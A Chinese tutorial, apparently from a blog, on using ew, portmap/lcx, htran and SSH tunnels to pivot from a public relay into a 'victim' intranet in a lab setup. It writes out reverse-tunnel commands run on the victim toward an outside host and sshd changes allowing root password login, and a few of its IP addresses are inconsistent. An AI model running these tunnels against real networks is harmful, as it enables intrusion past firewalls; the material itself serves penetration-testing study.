80端口攻击_内网端口转发工具的使用总结
0x00 ew端口转发
0x01 portmap端口转发
0x02 htran端口转发
0x03 ssh端口转发
0x00 ew端口转发
环境准备
攻击机 win7(物理机) 192.168.30.84
公网机 kali 192.168.30.131
受害机 win7(虚拟机) 192.168.30.126 (开启phpstudy服务)(请忽略攻击机和受害机的交互)
正向代理
1.物理机直接访问公网机,公网机未建立lamp环境,所以无法访问。
2.通过公网机将5555端口转发到受害机的80端口,就可以访问受害机的80端口。
3.发现访问5555端口,访问到了受害机的80端口。
反向代理
1.主机访问http://127.0.0.1/phpmyadmin/index.php,无法连接。
2.公网机(kali)运行./ew_for_linux -s rcsocks -l 5555 -e 6666 将5555的流量转发到6666端口,开启监听。
3.受害机(win7虚拟机)运行 ew_for_win_32.exe -s rssocks -d 192.168.32.100 -e 6666 流量转发成功。
4.攻击机(win7物理机)配置proxifer
点击 配置文件-->代理服务器-->添加公网机(配置如下)--->确定
配置文件-->代理规则-->选择代理-->确定
5.再次访问127.0.0.1/phpmyadmin访问成功,访问到了受害机的phpmyadmin。
0x01 portmap端口转发
工具最初使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上。但这个工具同样适用于运维工程师进行远程内网维护。
在windows下使用是lcx,在linux使用时为portmap。
前提:内网可以访问外网,检测方法就是直接ping一个外网IP即可。
下载地址:http://www.vuln.cn/wp-content/uploads/2016/06/lcxvuln.cn.zip
再本节,为了操作结果明显,故使用ssh(22)端口作为转发端口。
环境准备
公网机(我这里是阿里云centos) 47.240.62.93
受害机(kali虚拟机) 192.68.23.149
攻击机(虚拟机centos)
外网主机设置
1.外网主机开启6666和7777端口
2.设置portmap权限为777
kali开启ssh服务
1.修改/etc/ssh/sshd_config配置文件:
vi /etc/ssh/sshd_config
2.找到#PasswordAuthentication yes
把“#”去掉
3.找到# PermitRootLogin prohibit-password 改为PermitRootLogin yes
4.启动ssh服务
/etc/init.d/ssh start
5.设置开机自动启动
update-rc.d ssh enable
反向代理
1.虚拟主机执行
./portmap -m 2 -p1 6666 -h2 47.240.62.93 -p2 7777
开始监听6666传来的数据,然后监听7777端口提供访问
2.kali虚拟机执行 ./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2
将内网主机22端口的流量转发到公网主机的6666端口。
3.再本地centos虚拟机测试是否可以连接。使用ssh root@47.240.62.93 -p 7777
0x02 htran端口转发
环境准备
Win7物理机 192.168.30.84
Win7虚拟机 192.168.30.126
Win03虚拟机 192.168.23.129
情景:
一.服务器处于公网,可直接访问,已经开启3389,防火墙禁止直接连接3389
二.服务器处于公网,攻击机需要连接服务器所处内网的受害机。
使用方法:
本地监听转发
-p -listen ConnectPort TransmitPort
指定主机端口转发
-p -tran ConnectPort TransmitHost TransmitPort
将指定主机(TransmitHost)的指定端口转发到指定主机的指定端口,待连接的主机(ConnectHost)需先处于监听模式
-p -slave ConnectHost ConnectPort TransmitHost TransmitPort
端口转发
1.将3389端口转发到其他端口进行连接。
使用htran20.exe -p -tran 3333 127.0.0.1 3389
3389端口已经转发到3333端口,输入192.168.23.129:3333连接。
2.攻击机监听端口,受害机转发端口到攻击机监听的端口。
攻击机(Win7虚拟机)监听端口
受害机(Win03虚拟机)转发端口
Win7物理机访问win7虚拟机9999端口即可
0x03 ssh端口转发
准备:
A机器 本地linux虚拟机 centos 192.168.23.147
B机器 公网机 centos 47.240.62.93
A机器添加bbb用户
B机器添加aaa用户
B机器开启7280和1234端口
使用方法:
反向代理 ssh -fCNR
正向代理 ssh -fCNL
-f 后台执行ssh指令
-C 允许压缩数据
-N 不执行远程指令
-R 将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口
-L 将本地机(客户机)的某个端口转发到远端指定机器的指定端口
-p 指定远程主机的端口
端口转发:
1.建立A机器到B机器的反向代理
ssh -fCNR 7280:localhost:22 aaa@47.240.62.93
检查是否启动 ps aux | grep ssh
2.B机器正向代理,实现端口转发,来连接A机器。
ssh -fCNL *:1234:localhost:7280 localhost
检查是否启用 ps aux | grep ssh
1234端口为本地转发端口,负责和外网进行通信,并将数据转发的7280这个端口,实现了可以从其他机器访问的功能。
*代表所有可以接受任何ip的访问
3.在B机器上输入命令ssh -p1234 bbb@47.240.62.93
在上面指定了1234端口为转发端口,故用1234端口登陆,然后bbb是内网A机器的用户名,47.240.62.93为公网B机器的IP地址。
测试:
输入ip a查看当前ip,确认为A机器ip,转发成功。
80端口攻击_内网端口转发工具的使用总结相关推荐
- 路由器_内网端口映射
路由器_内网端口映射,nat_端口映射_工具_软件_远程桌面_连接端 口_花生壳_个人_FTP_服务器_WEB站点 1.让(家里)宿舍自己的电脑跟公司(外地)的电脑互相远程桌面连接(免得每次COPY东 ...
- mysql 1433端口映射_内网渗透-1433端口渗透过程
1.在内网环境中收集开放1433端口的服务器: 2.针对开放1433端口的服务器开始渗透: 2.1利用msf 爆破1433端口:192.168.10.251 (1)use auxiliary/scan ...
- openwrt设置内网端口映射
今天在raspberry群里,一个群友提出这样一个需求:他想通过电脑访问路由器(openwrt系统)的5555端口,相当于访问树莓派的22端口.好奇葩的需求,为什么不直接连接树莓派呢... 本来不想理 ...
- 内网端口 转发 穿透 工具简介
目录 一.LCX 1.lcx 内网端口转发(类似于SSH远程转发-R) 2.本地端口转发(类似于SSH本地转发-L) 二.nc反弹 正向连接 反向连接 三.socks代理工具 (1)Earthworm ...
- 利用nginx的stream模块实现内网端口的转发代理
nginx从1.9.0开始,新增加了一个stream模块,用来实现四层协议的转发.代理或者负载均衡等.比如在内网有一个mysql服务,想暴露到公网上去使用,就可以通过nginx代理的方式通过nginx ...
- Nginx转发内网端口
Nginx转发内网端口 Nginx安装 配置转发端口 Nginx安装 在Linux服务器上安装好Nginx 需要在Nginx官网上找到稳定版本的Nginx 链接: nginx下载地址 下载完后上传到你 ...
- 聊聊端口映射和内网穿透
今天又是说网络~~ 来聊聊端口映射和内网穿透趴~~ 专业词汇的理解 1.源地址:访问者 2.目标地址:被访问者 3.源地址转发: 比如你在家中,家中的电脑的内网ip地址为源地址,你的电脑需要上网,那么 ...
- 使用frp端口映射实现内网穿透(SSH、HTTP服务)
使用frp端口映射实现内网穿透(SSH.HTTP服务) 一.下载 通过内网穿透的原理和实现方式的学习我们已经明白了内网穿透的原理,想要实现内网穿透就需要让内网实现与具有公网IP的设备进行绑定. 我们这 ...
- 地址转换和端口映射及内网穿透的区别
1. NAT 地址转换 静态NAT 路由器上手动配置,一个私网地址和一个公网地址的关联.一一对应 动态NAT 路由器上配置一个公网IP地址池,当私网地址访问外网时从地址池里获取公网IP进行映射,当公网 ...
最新文章
- JS中获得窗口属性的方法
- file_operations结构
- java 磁盘空间_如何使用Java查找剩余的磁盘空间?
- Javascript——进阶(事件、数组操作、字符串操作、定时器)
- plantuml 方法图_UML与软件建模:第四次作业(学习PlantUML活动图绘制方法)
- IIS与Apache同时使用80端口
- 微软紧急修复两个 RCE,影响 Windows Codecs 库和 Visual Studio
- composer 安装yii2框架
- 开机时提示F1continue, F2 setup
- delphi压缩后使用http协议base64上传下载6G超大文件
- 微信模板消息html,微信推送模板消息,偶发出现报错errcode
- 微信小程序组件开发——可视化电影选座
- Data Structures and Algorithm Analysis in C, Second Edition(《数据结构与算法分析》C语言版 第二版)——Mark Allen Weiss
- Python入门(每日学习打卡7.12)
- html微信朋友圈demo,Vue.js实现模拟微信朋友圈开发demo
- 分布式系统上下层概念抽象-(2)
- 解决报错Connection terminated as request was larger than 10485760
- 知乎回答一键导出为PDF——Python实现
- linux 下搭建yolov3错误,yolov3---报段错误的可能原因及解决方法
- 一年级《江南》知识点心田花开汇总
热门文章
- .net数据源控件绑定mysql_数据源控件与数据绑定控件的进一步简单讨论(1)
- 在浏览器里,从输入 URL 到页面展示,这中间发生了什么?-学习笔记
- 超级详细AST抽象语法树Javascript
- Java黑皮书课后题第6章:*6.6(显示图案)编写方法显示如下图案:public static void displayPattern(int n)
- php制作曲线柱形图的框架,用GD图库生成横竖柱状图折线图的类_php
- 【强烈推荐】《剑指Offer:名企面试官精讲典型编程题》一书中IT名企经典面试题
- 开启POP3/SMTP服务
- hdu 6200 mustedge mustedge mustedge(dfs序+树状数组+并查集)
- maven选包算法(两个相同的包)
- CodeSmith和PowerDesigner的使用安装和数据库创建(原创系列教程)